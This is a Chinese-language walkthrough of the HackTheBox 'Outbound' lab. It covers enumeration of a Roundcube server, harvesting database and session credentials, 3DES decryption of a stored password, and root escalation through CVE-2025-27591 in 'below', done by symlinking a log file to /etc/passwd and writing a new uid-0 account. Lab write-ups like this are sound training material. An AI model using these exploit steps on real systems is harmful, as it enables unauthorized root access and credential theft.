Box Info #
| OS | Difficulty |
|---|---|
| Linux | Easy |
As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2
Nmap #
[root@Hacking] /home/kali/Outbound
❯ nmap outbound.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
添加mail.outbound.htb到/etc/hosts
Nuclei #
[root@Hacking] /home/kali/Outbound
❯ nuclei -u http://mail.outbound.htb/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 8154
[INF] Executing 7950 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 204 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1763 (Reduced 1654 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]
[roundcube-log-disclosure] [http] [medium] http://mail.outbound.htb/roundcube/logs/errors.log ["4192"] [roundcube_path="roundcube/logs/errors.log"]
[cookies-without-secure] [javascript] [info] mail.outbound.htb ["roundcube_sessid"]
[waf-detect:nginxgeneric] [http] [info] http://mail.outbound.htb/
[ssh-server-enumeration] [javascript] [info] mail.outbound.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12"]
[ssh-auth-methods] [javascript] [info] mail.outbound.htb:22 ["["publickey","password"]"]
[ssh-password-auth] [javascript] [info] mail.outbound.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] mail.outbound.htb:22
[openssh-detect] [tcp] [info] mail.outbound.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12"]
看起来存在CVE-2025-49113,但是呢这个漏洞利用需要身份认证,正好机器的信息给了
CVE-2025-49113 #
如下操作可以获取到反弹shell
docker环境哦
tyler用户
Mysql #
发现开放了3306端口,在网站目录下找到用户凭证
tyler@mail:/var/www/html/roundcube/config$ cat config.inc.php
<?php
$config = [];
// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
// or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';
// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';
// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';
// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';
$config['support_url'] = '';
$config['product_name'] = 'Roundcube Webmail';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
$config['plugins'] = [
'archive',
'zipdownload',
];
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';
tyler@mail:/var/www/html/roundcube/config$ mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from users;' -E
*************************** 1. row ***************************
user_id: 1
username: jacob
mail_host: localhost
created: 2025-06-07 13:55:18
last_login: 2025-06-11 07:52:49
failed_login: 2025-06-11 07:51:32
failed_login_counter: 1
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
*************************** 2. row ***************************
user_id: 2
username: mel
mail_host: localhost
created: 2025-06-08 12:04:51
last_login: 2025-06-08 13:29:05
failed_login: NULL
failed_login_counter: NULL
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
*************************** 3. row ***************************
user_id: 3
username: tyler
mail_host: localhost
created: 2025-06-08 13:28:55
last_login: 2025-07-14 13:55:53
failed_login: 2025-06-11 07:51:22
failed_login_counter: 1
language: en_US
preferences: a:2:{s:11:"client_hash";s:16:"skuY0BrQUEW6IpOo";i:0;b:0;}
其中这个hash的格式我没找到,但是在session表中找到了
tyler@mail:/$ mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from session;' -E
*************************** 1. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
changed: 2025-06-08 15:46:40
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
进行Base64解密,发现是jacob的
3DES decrypt #
在之前的config.inc.php中发现了一个des_key,并且在session中也解密出了一个auth_secret,经过信息收集,发现使用的是Triple DES
先用base64解密后转十六进制,前八个字节作为IV,后面的作为密文
ssh登录
Root #
查看sudo -l,发现命令存在通配符
jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jacob may run the following commands on outbound:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
//jacob 可以无密码运行 /usr/bin/below *,但禁止以下参数: --config*、--debug*、-d*
查看一下帮助信息
jacob@outbound:~$ sudo /usr/bin/below -h
Usage: below [OPTIONS] [COMMAND]
Commands:
live Display live system data (interactive) (default)
record Record local system data (daemon mode)
replay Replay historical data (interactive)
debug Debugging facilities (for development use)
dump Dump historical data into parseable text format
snapshot Create a historical snapshot file for a given time range
help Print this message or the help of the given subcommand(s)
Options:
--config <CONFIG> [default: /etc/below/below.conf]
-d, --debug
-h, --help Print help
经过搜索,实际上考点是:CVE-2025-27591,但是做了些许改动
error_root.log是可以写入状态
jacob@outbound:/var/log/below$ echo 'root2:aacFCuAIHhrCM:0:0:,,,:/root:/bin/bash' > root2
jacob@outbound:/var/log/below$ rm error_root.log
jacob@outbound:/var/log/below$ ln -s /etc/passwd /var/log/below/error_root.log
jacob@outbound:/var/log/below$ sudo /usr/bin/below
jacob@outbound:/var/log/below$ cp root2 error_root.log
jacob@outbound:/var/log/below$ su root2
Password:
root2@outbound:/var/log/below# id
uid=0(root) gid=0(root) groups=0(root)
root2@outbound:/var/log/below#
[root@Hacking] /home/kali
❯ perl -e 'print crypt("1","aa")'
aacFCuAIHhrCM#
总结一下就是,执行了sudo /usr/bin/below之后,error_root.log的权限会设置为可写,通过软链接到/etc/passwd,修改了权限,导致我们可以覆盖。